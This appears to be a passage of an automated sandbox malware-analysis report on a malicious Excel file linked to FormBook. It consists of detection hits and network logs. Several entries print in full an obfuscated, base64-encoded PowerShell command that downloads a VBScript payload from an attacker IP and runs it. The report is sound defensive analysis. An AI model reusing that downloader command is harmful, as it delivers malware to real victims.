              Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3392, Protocol: tcp, SourceIp: 188.114.96.6, SourceIsIpv6: false, SourcePort: 443
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , ProcessId: 4052, ProcessName: wscript.exe
              Sigma detected: Dynamic CSharp Compile Artefact
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3848, TargetFilename: C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline
              Sigma detected: Modification of IE Registry Settings
              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3392, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))", CommandLine: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICA
              Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3848, TargetFilename: C:\Users\user\AppData\Local\Temp\zh1bgx2j.xut.ps1

              Data Obfuscation

              barindex
              Sigma detected: Dot net compiler compiles file from suspicious location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline", ProcessId: 3940, ProcessName: csc.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-02T07:24:37.155691+010020241971A Network Trojan was detected146.70.113.20080192.168.2.2249162TCP
              2024-12-02T07:24:42.088685+010020241971A Network Trojan was detected146.70.113.20080192.168.2.2249164TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-02T07:24:37.155643+010020244491Attempted User Privilege Gain192.168.2.2249162146.70.113.20080TCP
              2024-12-02T07:24:42.088643+010020244491Attempted User Privilege Gain192.168.2.2249164146.70.113.20080TCP
              2024-12-02T07:25:03.187164+010020244491Attempted User Privilege Gain192.168.2.2249171146.70.113.20080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-02T07:25:02.943212+010020490381A Network Trojan was detected142.215.209.77443192.168.2.2249167TCP
              2024-12-02T07:25:21.057960+010020490381A Network Trojan was detected142.215.209.77443192.168.2.2249172TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-02T07:24:49.307750+010028587951A Network Trojan was detected192.168.2.2249165146.70.113.20080TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: PO#BBGR2411PO69.xlsVirustotal: Detection: 7%Perma Link
              Yara detected FormBook
              Source: Yara matchFile source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

              Phishing

              barindex
              Yara detected HtmlPhish44
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthingsgivenmegood[1].hta, type: DROPPED
              Source: unknownHTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49167 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49172 version: TLS 1.0
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: unknownHTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49161 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49163 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49170 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49169 version: TLS 1.2
              Source: Binary string: .pdb>Uxx source: powershell.exe, 00000013.00000002.490184350.000000001AB44000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdb source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdbhP source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdbhP source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdb source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Document exploit detected (process start blacklist hit)
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: global trafficDNS query: name: linkjago.me
              Source: global trafficDNS query: name: linkjago.me
              Source: global trafficDNS query: name: linkjago.me
              Source: global trafficDNS query: name: linkjago.me
              Source: global trafficDNS query: name: 1016.filemail.com
              Source: global trafficDNS query: name: 1016.filemail.com
              Source: global trafficDNS query: name: linkjago.me
              Source: global trafficDNS query: name: linkjago.me
              Source: global trafficDNS query: name: linkjago.me
              Source: global trafficDNS query: name: 1016.filemail.com
              Source: global trafficDNS query: name: 1016.filemail.com
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49174 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
